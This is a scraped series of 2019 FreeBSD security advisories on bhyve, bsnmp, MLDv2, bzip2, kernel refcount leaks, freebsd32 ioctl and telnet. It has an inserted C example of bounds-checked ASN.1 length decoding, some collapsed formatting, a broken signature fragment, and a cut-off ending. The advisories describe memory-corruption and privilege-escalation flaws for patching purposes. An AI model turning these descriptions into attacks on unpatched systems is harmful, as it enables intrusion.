https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5611

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:22.mbuf.asc
FreeBSD Security Advisory FreeBSD-SA-19:21.bhyve
FreeBSD-SA-19:21.bhyve                                      Security Advisory
                                                          The FreeBSD Project

Topic:          Insufficient validation of guest-supplied data (e1000 device)

Category:       core
Module:         bhyve
Announced:      2019-08-06
Credits:        Reno Robert
Affects:        All supported versions of FreeBSD.
Corrected:      2019-08-05 22:04:16 UTC (stable/12, 12.0-STABLE)
                2019-08-06 17:13:17 UTC (releng/12.0, 12.0-RELEASE-p9)
                2019-08-05 22:04:16 UTC (stable/11, 11.3-STABLE)
                2019-08-06 17:13:17 UTC (releng/11.3, 11.3-RELEASE-p2)
                2019-08-06 17:13:17 UTC (releng/11.2, 11.2-RELEASE-p13)
CVE Name:       CVE-2019-5609

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/.

I. Background

bhyve(8) is a hypervisor that supports running a variety of guest operating
systems in virtual machines. bhyve(8) includes an emulated Intel 82545
network interface adapter ("e1000").

II. Problem Description

The e1000 network adapters permit a variety of modifications to an Ethernet
packet when it is being transmitted. These include the insertion of IP and
TCP checksums, insertion of an Ethernet VLAN header, and TCP segmentation
offload ("TSO"). The e1000 device model uses an on-stack buffer to generate
the modified packet header when simulating these modifications on
transmitted packets.

When TCP segmentation offload is requested for a transmitted packet, the
e1000 device model used a guest-provided value to determine the size of the
on-stack buffer without validation. The subsequent header generation could
overflow an incorrectly sized buffer or dereference a pointer composed of
stack garbage.

III. Impact

A misbehaving bhyve guest could overwrite memory in the bhyve process on
the host.

IV. Workaround

Only the e1000 device model is affected; the virtio-net device is not
affected by this issue.
If supported by the guest operating system, presenting only the virtio-net
device to the guest is a suitable workaround. No workaround is available if
the e1000 device model is required.

V. Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date, and restart any
affected virtual machines.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD
release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:21/bhyve.patch
# fetch https://security.FreeBSD.org/patches/SA-19:21/bhyve.patch.asc
# gpg --verify bhyve.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in https://www.FreeBSD.org/handbook/makeworld.html.

Restart the applicable virtual machines, or reboot the system.

VI. Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r350619
releng/12.0/                                                      r350647
stable/11/                                                        r350619
releng/11.3/                                                      r350647
releng/11.2/                                                      r350647
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine with
Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII.
References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5609

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:21.bhyve.asc
FreeBSD Security Advisory FreeBSD-SA-19:20.bsnmp
FreeBSD-SA-19:20.bsnmp                                      Security Advisory
                                                          The FreeBSD Project

Topic:          Insufficient message length validation in bsnmp library

Category:       contrib
Module:         bsnmp
Announced:      2019-08-06
Credits:        Guido Vranken
Affects:        All supported versions of FreeBSD.
Corrected:      2019-08-06 16:11:16 UTC (stable/12, 12.0-STABLE)
                2019-08-06 17:12:17 UTC (releng/12.0, 12.0-RELEASE-p9)
                2019-08-06 16:12:43 UTC (stable/11, 11.3-STABLE)
                2019-08-06 17:12:17 UTC (releng/11.3, 11.3-RELEASE-p2)
                2019-08-06 17:12:17 UTC (releng/11.2, 11.2-RELEASE-p13)
CVE Name:       CVE-2019-5610

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/.

I. Background

The bsnmp software library is used for the Internet SNMP (Simple Network
Management Protocol). As part of this it includes functions to handle ASN.1
(Abstract Syntax Notation One).

II. Problem Description

A function extracting the length from type-length-value encoding is not
properly validating the submitted length.

III. Impact

A remote user could cause, for example, an out-of-bounds read, decoding of
unrelated data, or trigger a crash of the software such as bsnmpd,
resulting in a denial of service.

IV. Workaround

No workaround is available.

V. Solution

Perform one of the following:

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD
release branches.
a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:20/bsnmp.patch
# fetch https://security.FreeBSD.org/patches/SA-19:20/bsnmp.patch.asc
# gpg --verify bsnmp.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in https://www.FreeBSD.org/handbook/makeworld.html.

Restart all daemons that use the library, or reboot the system.

VI. Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r350637
releng/12.0/                                                      r350646
stable/11/                                                        r350638
releng/11.3/                                                      r350646
releng/11.2/                                                      r350646
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine with
Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII.
References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5610

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:20.bsnmp.asc
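The length check that the bsnmp advisory above says was missing, shown as an added C example that is not bsnmp's own code: a BER/ASN.1 type-length-value decoder that refuses any declared length the remaining message cannot hold. The function names, error codes and the two sample encodings are constructed for this example.

```c
/* Added example (not bsnmp's code): decode a BER length field from a
 * type-length-value encoding with the bounds checks a decoder needs
 * before it trusts the length a remote peer supplied. */
#include <stddef.h>
#include <stdint.h>

#define TLV_OK            0
#define TLV_ERR_TRUNCATED 1   /* declared length runs past the input  */
#define TLV_ERR_LENGTH    2   /* length octets malformed/unsupported  */

/* Decode the length octets at buf[*pos]. On success store the content
 * length in *len, advance *pos past the length octets, and guarantee
 * that *len bytes of content really are present in the buffer. */
int tlv_decode_length(const uint8_t *buf, size_t buflen, size_t *pos,
                      size_t *len)
{
    size_t i = *pos;
    uint8_t first;

    if (i >= buflen)
        return TLV_ERR_TRUNCATED;
    first = buf[i++];

    if ((first & 0x80) == 0) {
        *len = first;                   /* short form: 0..127 */
    } else {
        size_t nlen = first & 0x7f;     /* long form: count of octets */
        size_t v = 0;

        /* 0x80 is the indefinite form, which BER-encoded SNMP does not
         * use; more octets than size_t holds cannot be represented. */
        if (nlen == 0 || nlen > sizeof(size_t))
            return TLV_ERR_LENGTH;
        if (nlen > buflen - i)          /* length octets themselves cut */
            return TLV_ERR_TRUNCATED;
        while (nlen-- > 0)
            v = (v << 8) | buf[i++];
        *len = v;
    }

    /* The check the advisory describes as missing: the declared content
     * length must fit in what remains of the message, otherwise a caller
     * that trusts it reads out of bounds or decodes unrelated data. */
    if (*len > buflen - i)
        return TLV_ERR_TRUNCATED;

    *pos = i;
    return TLV_OK;
}

/* Decode one complete TLV: tag, validated length, pointer to value. */
int tlv_decode(const uint8_t *buf, size_t buflen, size_t *pos,
               uint8_t *tag, const uint8_t **value, size_t *len)
{
    int rc;

    if (*pos >= buflen)
        return TLV_ERR_TRUNCATED;
    *tag = buf[(*pos)++];
    rc = tlv_decode_length(buf, buflen, pos, len);
    if (rc != TLV_OK)
        return rc;
    *value = buf + *pos;
    *pos += *len;                       /* safe: checked above */
    return TLV_OK;
}

/* Constructed samples: an INTEGER 5 (02 01 05), and an OCTET STRING whose
 * long-form length claims 0x0100 bytes while only 3 follow; a trusting
 * decoder would read 253 bytes past the end of the buffer. */
static const uint8_t sample_good[] = { 0x02, 0x01, 0x05 };
static const uint8_t sample_bad[]  = { 0x04, 0x82, 0x01, 0x00, 'a', 'b', 'c' };

/* Decoded INTEGER value of sample_good, or -1 on any decode error. */
int decode_sample_good(void)
{
    size_t pos = 0, len;
    uint8_t tag;
    const uint8_t *val;

    if (tlv_decode(sample_good, sizeof(sample_good), &pos, &tag, &val, &len)
        != TLV_OK || tag != 0x02 || len != 1)
        return -1;
    return val[0];
}

/* Error code produced for the over-long sample_bad. */
int decode_sample_bad(void)
{
    size_t pos = 0, len;
    uint8_t tag;
    const uint8_t *val;

    return tlv_decode(sample_bad, sizeof(sample_bad), &pos, &tag, &val, &len);
}
```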
FreeBSD Security Advisory FreeBSD-SA-19:19.mldv2
FreeBSD-SA-19:19.mldv2                                      Security Advisory
                                                          The FreeBSD Project

Topic:          ICMPv6 / MLDv2 out-of-bounds memory access

Category:       core
Module:         net
Announced:      2019-08-06
Credits:        CJD of Apple
Affects:        All supported versions of FreeBSD.
Corrected:      2019-08-06 17:13:41 UTC (stable/12, 12.0-STABLE)
                2019-08-06 17:11:17 UTC (releng/12.0, 12.0-RELEASE-p9)
                2019-08-06 17:15:46 UTC (stable/11, 11.3-STABLE)
                2019-08-06 17:11:17 UTC (releng/11.3, 11.3-RELEASE-p2)
                2019-08-06 17:11:17 UTC (releng/11.2, 11.2-RELEASE-p13)
CVE Name:       CVE-2019-5608

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/.

I. Background

MLDv2 is the Multicast Listener Discovery protocol, version 2. It is used
by IPv6 routers to discover multicast listeners.

II. Problem Description

The ICMPv6 input path incorrectly handles cases where an MLDv2 listener
query packet is internally fragmented across multiple mbufs.

III. Impact

A remote attacker may be able to cause an out-of-bounds read or write that
may cause the kernel to attempt to access an unmapped page and subsequently
panic.

IV. Workaround

No workaround is available. Systems not using IPv6 are not affected.

V. Solution

Perform one of the following:

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date, and reboot.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Reboot for security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD
release branches.
a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.2, FreeBSD 11.3]
# fetch https://security.FreeBSD.org/patches/SA-19:19/mldv2.11.patch
# fetch https://security.FreeBSD.org/patches/SA-19:19/mldv2.11.patch.asc
# gpg --verify mldv2.11.patch.asc

[FreeBSD 12.0]
# fetch https://security.FreeBSD.org/patches/SA-19:19/mldv2.12.patch
# fetch https://security.FreeBSD.org/patches/SA-19:19/mldv2.12.patch.asc
# gpg --verify mldv2.12.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html and reboot the system.

VI. Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r350648
releng/12.0/                                                      r350644
stable/11/                                                        r350650
releng/11.3/                                                      r350644
releng/11.2/                                                      r350644
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine with
Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII.
References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5608

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:19.mldv2.asc
FreeBSD Security Advisory FreeBSD-SA-19:18.bzip2
FreeBSD-SA-19:18.bzip2                                      Security Advisory
                                                          The FreeBSD Project

Topic:          Multiple vulnerabilities in bzip2

Category:       contrib
Module:         bzip2
Announced:      2019-08-06
Affects:        All supported versions of FreeBSD.
Corrected:      2019-07-04 07:29:18 UTC (stable/12, 12.0-STABLE)
                2019-08-06 17:09:47 UTC (releng/12.0, 12.0-RELEASE-p9)
                2019-07-04 07:32:25 UTC (stable/11, 11.3-STABLE)
                2019-08-06 17:09:47 UTC (releng/11.3, 11.3-RELEASE-p2)
                2019-08-06 17:09:47 UTC (releng/11.2, 11.2-RELEASE-p13)
CVE Name:       CVE-2016-3189, CVE-2019-12900

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/.

I. Background

The bzip2(1)/bunzip2(1) utilities and the libbz2 library compress and
decompress files using an algorithm based on the Burrows-Wheeler
transform. They are generally slower than Lempel-Ziv compressors such as
gzip, but usually provide a greater compression ratio.

The bzip2recover utility extracts blocks from a damaged bzip2(1) file,
permitting partial recovery of the contents of the file.

II. Problem Description

The decompressor used in bzip2 contains a bug which can lead to an
out-of-bounds write when processing a specially crafted bzip2(1) file.

bzip2recover contains a heap use-after-free bug which can be triggered when
processing a specially crafted bzip2(1) file.

III. Impact

An attacker who can cause maliciously crafted input to be processed may
trigger either of these bugs. The bzip2recover bug may cause a crash,
permitting a denial-of-service. The bzip2 decompressor bug could
potentially be exploited to execute arbitrary code.
Note that some utilities, including the tar(1) archiver and the bspatch(1)
binary patching utility (used in portsnap(8) and freebsd-update(8)),
decompress bzip2(1)-compressed data internally; system administrators
should assume that their systems will at some point decompress
bzip2(1)-compressed data even if they never explicitly invoke the
bunzip2(1) utility.

IV. Workaround

No workaround is available.

V. Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date, and restart
daemons if necessary.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD
release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:18/bzip2.patch
# fetch https://security.FreeBSD.org/patches/SA-19:18/bzip2.patch.asc
# gpg --verify bzip2.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in https://www.FreeBSD.org/handbook/makeworld.html.

Restart all daemons that use the library, or reboot the system.

VI. Correction details

The following list contains the correction revision numbers for each
affected branch.
Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r349717
releng/12.0/                                                      r350643
stable/11/                                                        r349718
releng/11.3/                                                      r350643
releng/11.2/                                                      r350643
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine with
Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12900

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:18.bzip2.asc
FreeBSD Security Advisory FreeBSD-SA-19:16.bhyve
FreeBSD-SA-19:16.bhyve                                      Security Advisory
                                                          The FreeBSD Project

Topic:          Bhyve out-of-bounds read in XHCI device

Category:       core
Module:         bhyve
Announced:      2019-07-24
Credits:        Reno Robert
Affects:        All supported versions of FreeBSD.
Corrected:      2019-07-23 17:48:37 UTC (stable/12, 12.0-STABLE)
                2019-07-24 12:56:06 UTC (releng/12.0, 12.0-RELEASE-p8)
                2019-07-23 17:48:37 UTC (stable/11, 11.2-STABLE)
                2019-07-24 12:56:06 UTC (releng/11.2, 11.2-RELEASE-p12)
                2019-07-24 12:56:06 UTC (releng/11.3, 11.3-RELEASE-p1)
CVE Name:       CVE-2019-5604

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/.

I. Background

bhyve(8) is a hypervisor that supports running a variety of virtual
machines (guests). bhyve includes an emulated XHCI device.

II. Problem Description

The pci_xhci_device_doorbell() function does not validate the 'epid' and
'streamid' provided by the guest, leading to an out-of-bounds read.

III. Impact

A misbehaving bhyve guest could crash the system or access memory that it
should not be able to.

IV. Workaround

No workaround is available; however, systems not using bhyve(8) for
virtualization are not vulnerable.

V. Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date. No reboot is
required. Rather, the bhyve(8) process for vulnerable virtual machines
should be restarted.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Restart any bhyve virtual machines or reboot the system.
2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD
release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:16/bhyve.patch
# fetch https://security.FreeBSD.org/patches/SA-19:16/bhyve.patch.asc
# gpg --verify bhyve.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in https://www.FreeBSD.org/handbook/makeworld.html.

Restart any bhyve virtual machines, or reboot the system.

VI. Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r350246
releng/12.0/                                                      r350285
stable/11/                                                        r350247
releng/11.2/                                                      r350285
releng/11.3/                                                      r350285
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine with
Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII.
References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5604

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:16.bhyve.asc
FreeBSD Security Advisory FreeBSD-SA-19:17.fd
FreeBSD-SA-19:17.fd                                         Security Advisory
                                                          The FreeBSD Project

Topic:          File description reference count leak

Category:       core
Module:         unix
Announced:      2019-07-24
Credits:        Mark Johnston
Affects:        All supported versions of FreeBSD.
Corrected:      2019-07-22 19:25:05 UTC (stable/12, 12.0-STABLE)
                2019-07-24 12:57:49 UTC (releng/12.0, 12.0-RELEASE-p8)
                2019-07-22 19:27:23 UTC (stable/11, 11.2-STABLE)
                2019-07-24 12:57:49 UTC (releng/11.2, 11.2-RELEASE-p12)
                2019-07-24 12:57:49 UTC (releng/11.3, 11.3-RELEASE-p1)
CVE Name:       CVE-2019-5607

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/.

I. Background

UNIX-domain sockets are used for inter-process communication. It is
possible to use UNIX-domain sockets to transfer rights, encoded as file
descriptors, to another process. Rights are encapsulated in control
messages, and multiple such messages may be transmitted with a single
system call.

II. Problem Description

If a process attempts to transmit rights over a UNIX-domain socket and an
error causes the attempt to fail, references acquired on the rights are not
released and are leaked. This bug can be used to cause the reference
counter to wrap around and free the corresponding file structure.

III. Impact

A local user can exploit the bug to gain root privileges or escape from a
jail.

IV. Workaround

No workaround is available.

V. Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date.
Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10min "Rebooting for a security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 11.2] # fetch https://security.FreeBSD.org/patches/SA-19:17/fd.11.2.patch # fetch https://security.FreeBSD.org/patches/SA-19:17/fd.11.2.patch.asc # gpg --verify fd.11.2.patch.asc [FreeBSD 11.3] # fetch https://security.FreeBSD.org/patches/SA-19:17/fd.11.patch # fetch https://security.FreeBSD.org/patches/SA-19:17/fd.11.patch.asc # gpg --verify fd.11.patch.asc [FreeBSD 12.0] # fetch https://security.FreeBSD.org/patches/SA-19:17/fd.12.patch # fetch https://security.FreeBSD.org/patches/SA-19:17/fd.12.patch.asc # gpg --verify fd.12.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r350222 releng/12.0/ r350286 stable/11/r350223 releng/11.2/ r350286 releng/11.3/ r350286 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. 
References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5607> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:17.fd.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl04WnBfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cIOTQ/+KQMGXwNiuMVNib5ErewD9QdT48NYaU/hYUub3VMAfQltvWmbiPw7zXj7 yJGm9FxWrMvZ6hFnKskV60u9d7PMYkOv4nzcaFgPoadByXXlALQGd
FreeBSD Security Advisory FreeBSD-SA-19:15.mqueuefs
FreeBSD-SA-19:15.mqueuefs                                   Security Advisory
                                                          The FreeBSD Project

Topic:          Reference count overflow in mqueue filesystem

Category:       core
Module:         kernel
Announced:      2019-07-24
Credits:        Mateusz Guzik
Affects:        All supported versions of FreeBSD.
Corrected:      2019-07-23 21:12:32 UTC (stable/12, 12.0-STABLE)
                2019-07-24 12:55:16 UTC (releng/12.0, 12.0-RELEASE-p8)
                2019-07-23 21:15:28 UTC (stable/11, 11.2-STABLE)
                2019-07-24 12:55:16 UTC (releng/11.2, 11.2-RELEASE-p12)
                2019-07-24 12:55:16 UTC (releng/11.3, 11.3-RELEASE-p1)
CVE Name:       CVE-2019-5603

For general information regarding FreeBSD Security Advisories, including
descriptions of the fields above, security branches, and the following
sections, please visit https://security.FreeBSD.org/.

I.   Background

mqueuefs(5) implements the POSIX message queue file system, which can be
used by processes as a communication mechanism. 'struct file' represents
open files, directories, sockets and other entities.

II.  Problem Description

System calls operating on file descriptors obtain a reference to the
relevant struct file which, due to a programming error, was not always put
back. This in turn could be used to overflow the reference counter of the
affected struct file.

III. Impact

A local user can use this flaw to obtain access to files, directories,
sockets etc. opened by processes owned by other users. If the obtained
struct file represents a directory from outside of the user's jail, it can
be used to access files outside of the jail. If the user in question is a
jailed root, they can obtain root privileges on the host system.

IV.  Workaround

No workaround is available. Note that the mqueuefs file system is not
enabled by default.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD
release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:15/mqueuefs.patch
# fetch https://security.FreeBSD.org/patches/SA-19:15/mqueuefs.patch.asc
# gpg --verify mqueuefs.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r350261
releng/12.0/                                                      r350284
stable/11/                                                        r350263
releng/11.2/                                                      r350284
releng/11.3/                                                      r350284
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following
command, replacing NN with the revision number, on a machine with Subversion
installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5603

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:15.mqueuefs.asc
FreeBSD Security Advisory FreeBSD-SA-19:14.freebsd32
FreeBSD-SA-19:14.freebsd32                                  Security Advisory
                                                          The FreeBSD Project

Topic:          Kernel memory disclosure in freebsd32_ioctl

Category:       core
Module:         kernel
Announced:      2019-07-24
Credits:        Ilja van Sprundel, IOActive
Affects:        FreeBSD 11.2 and FreeBSD 11.3
Corrected:      2019-07-22 18:14:34 UTC (stable/11, 11.2-STABLE)
                2019-07-24 12:54:10 UTC (releng/11.2, 11.2-RELEASE-p12)
                2019-07-24 12:54:10 UTC (releng/11.3, 11.3-RELEASE-p1)
CVE Name:       CVE-2019-5605

For general information regarding FreeBSD Security Advisories, including
descriptions of the fields above, security branches, and the following
sections, please visit https://security.FreeBSD.org/.

I.   Background

The FreeBSD kernel supports executing 32-bit applications on a 64-bit
kernel, including the ioctl(2) interface.

II.  Problem Description

Due to insufficient initialization of memory copied to userland in the
components listed above, small amounts of kernel memory may be disclosed to
userland processes.

III. Impact

A user who can invoke 32-bit FreeBSD ioctls may be able to read the contents
of small portions of kernel memory. Such memory might contain sensitive
information, such as portions of the file cache or terminal buffers. This
information might be directly useful, or it might be leveraged to obtain
elevated privileges in some way; for example, a terminal buffer might
include a user-entered password.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD
release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:14/freebsd32.patch
# fetch https://security.FreeBSD.org/patches/SA-19:14/freebsd32.patch.asc
# gpg --verify freebsd32.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/11/                                                        r350217
releng/11.2/                                                      r350283
releng/11.3/                                                      r350283
-------------------------------------------------------------------------

Note: This issue was addressed in a different way prior to the branch point
for stable/12. As such, no patch is needed for FreeBSD 12.x.

To see which files were modified by a particular revision, run the following
command, replacing NN with the revision number, on a machine with Subversion
installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5605

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:14.freebsd32.asc
FreeBSD Security Advisory FreeBSD-SA-19:12.telnet
FreeBSD-SA-19:12.telnet                                     Security Advisory
                                                          The FreeBSD Project

Topic:          telnet(1) client multiple vulnerabilities

Category:       contrib
Module:         contrib/telnet
Announced:      2019-07-24
Credits:        Juniper Networks
Affects:        All supported versions of FreeBSD.
Corrected:      2019-07-19 15:37:29 UTC (stable/12, 12.0-STABLE)
                2019-07-24 12:51:52 UTC (releng/12.0, 12.0-RELEASE-p8)
                2019-07-19 15:27:53 UTC (stable/11, 11.2-STABLE)
                2019-07-24 12:51:52 UTC (releng/11.2, 11.2-RELEASE-p12)
                2019-07-24 12:51:52 UTC (releng/11.3, 11.3-RELEASE-p1)
CVE Name:       CVE-2019-0053

For general information regarding FreeBSD Security Advisories, including
descriptions of the fields above, security branches, and the following
sections, please visit https://security.FreeBSD.org/.

I.   Background

The telnet(1) command is a TELNET protocol client, used primarily to
establish terminal sessions across a network.

II.  Problem Description

Insufficient validation of environment variables in the telnet client
supplied in FreeBSD can lead to stack-based buffer overflows. A stack-based
overflow is present in the handling of environment variables when connecting
via the telnet client to remote telnet servers.

This issue only affects the telnet client. Inbound telnet sessions to
telnetd(8) are not affected by this issue.

III. Impact

These buffer overflows may be triggered when connecting to a malicious
